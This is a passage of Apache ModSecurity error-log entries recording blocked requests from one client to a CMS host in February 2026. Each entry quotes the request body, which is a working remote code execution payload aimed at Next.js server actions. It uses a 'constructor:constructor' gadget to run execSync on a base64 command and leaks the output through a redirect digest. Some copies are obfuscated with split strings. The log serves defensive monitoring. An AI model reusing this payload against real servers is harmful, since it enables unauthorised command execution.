"aZGJrR4-YzjAtCob1sG9tgAAAFc"] [Sun Feb 15 10:54:05.928073 2026] [:error] [pid 27901:tid 27950] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zugu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _civm=Buffer.from(_zugu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_civm};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZGJrR4-YzjAtCob1sG9twAAAEQ"] [Sun Feb 15 10:54:05.949179 2026] [:error] [pid 27901:tid 27951] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _apbv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _shgx=Buffer.from(_apbv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_shgx};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZGJrR4-YzjAtCob1sG9uAAAAEU"] [Sun Feb 15 10:54:05.970410 2026] [:error] [pid 27901:tid 27964] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ckgw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bzaf=Buffer.from(_ckgw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bzaf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9uQAAAFI"] [Sun Feb 15 10:54:05.991187 2026] [:error] [pid 27901:tid 27959] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zoln=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _hlpp=Buffer.from(_zoln).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hlpp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9ugAAAE0"] [Sun Feb 15 10:54:06.013968 2026] [:error] [pid 27901:tid 27949] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _tprd=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _yzww=Buffer.from(_tprd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yzww};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZGJrR4-YzjAtCob1sG9uwAAAEM"] [Sun Feb 15 10:54:06.036941 2026] [:error] [pid 27901:tid 27968] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _kkkc=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bcdw=Buffer.from(_kkkc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bcdw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZGJrh4-YzjAtCob1sG9vAAAAFU"] [Sun Feb 15 10:54:06.056995 2026] [:error] [pid 27901:tid 27958] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cjgb=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _cnwb=Buffer.from(_cjgb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_cnwb};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZGJrh4-YzjAtCob1sG9vQAAAEw"] [Sun Feb 15 10:54:06.077281 2026] [:error] [pid 27901:tid 27946] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dmlw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _atzv=Buffer.from(_dmlw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_atzv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZGJrh4-YzjAtCob1sG9vgAAAEA"] [Sun Feb 15 10:54:06.097432 2026] [:error] [pid 27901:tid 27955] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _izie=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zfsq=Buffer.from(_izie).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zfsq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrh4-YzjAtCob1sG9vwAAAEk"] [Sun Feb 15 10:54:06.114068 2026] [:error] [pid 27901:tid 27966] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gztp=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ngtj=Buffer.from(_gztp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ngtj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrh4-YzjAtCob1sG9wAAAAFQ"] [Sun Feb 15 10:54:06.129935 2026] [:error] [pid 27901:tid 27956] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vmgb=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _vnrt=Buffer.from(_vmgb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_vnrt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZGJrh4-YzjAtCob1sG9wQAAAEo"] [Sun Feb 15 10:54:06.146225 2026] [:error] [pid 27901:tid 27965] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ximx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _wrkk=Buffer.from(_ximx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wrkk};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZGJrh4-YzjAtCob1sG9wgAAAFM"] [Sun Feb 15 10:54:06.161914 2026] [:error] [pid 27901:tid 27947] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _sdxq=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _pqrv=Buffer.from(_sdxq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_pqrv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZGJrh4-YzjAtCob1sG9wwAAAEE"] [Sun Feb 15 10:54:06.177314 2026] [:error] [pid 27901:tid 27948] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _kneq=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qqyt=Buffer.from(_kneq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qqyt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZGJrh4-YzjAtCob1sG9xAAAAEI"] [Tue Feb 17 01:30:19.003260 2026] [:error] [pid 20915:tid 20950] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _obvj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _kija=Buffer.from(_obvj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_kija};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoilEzrCvApMtoJCX1JAAAARg"] [Tue Feb 17 01:30:19.020812 2026] [:error] [pid 20915:tid 20939] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jucb=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _myzv=Buffer.from(_jucb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_myzv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1JQAAAQ0"] [Tue Feb 17 01:30:19.037070 2026] [:error] [pid 20915:tid 20929] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bklg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _avlt=Buffer.from(_bklg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_avlt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZOoi1EzrCvApMtoJCX1JwAAAQM"] [Tue Feb 17 01:30:19.053351 2026] [:error] [pid 20915:tid 20940] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xzdy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _kpip=Buffer.from(_xzdy).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_kpip};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZOoi1EzrCvApMtoJCX1KAAAAQ4"] [Tue Feb 17 01:30:19.070560 2026] [:error] [pid 20915:tid 20949] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qvbe=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hjxn=Buffer.from(_qvbe).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hjxn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZOoi1EzrCvApMtoJCX1KQAAARc"] [Tue Feb 17 01:30:19.086843 2026] [:error] [pid 20915:tid 20938] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _rnae=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _vbwy=Buffer.from(_rnae).toString('base64');throw Object.assign(new 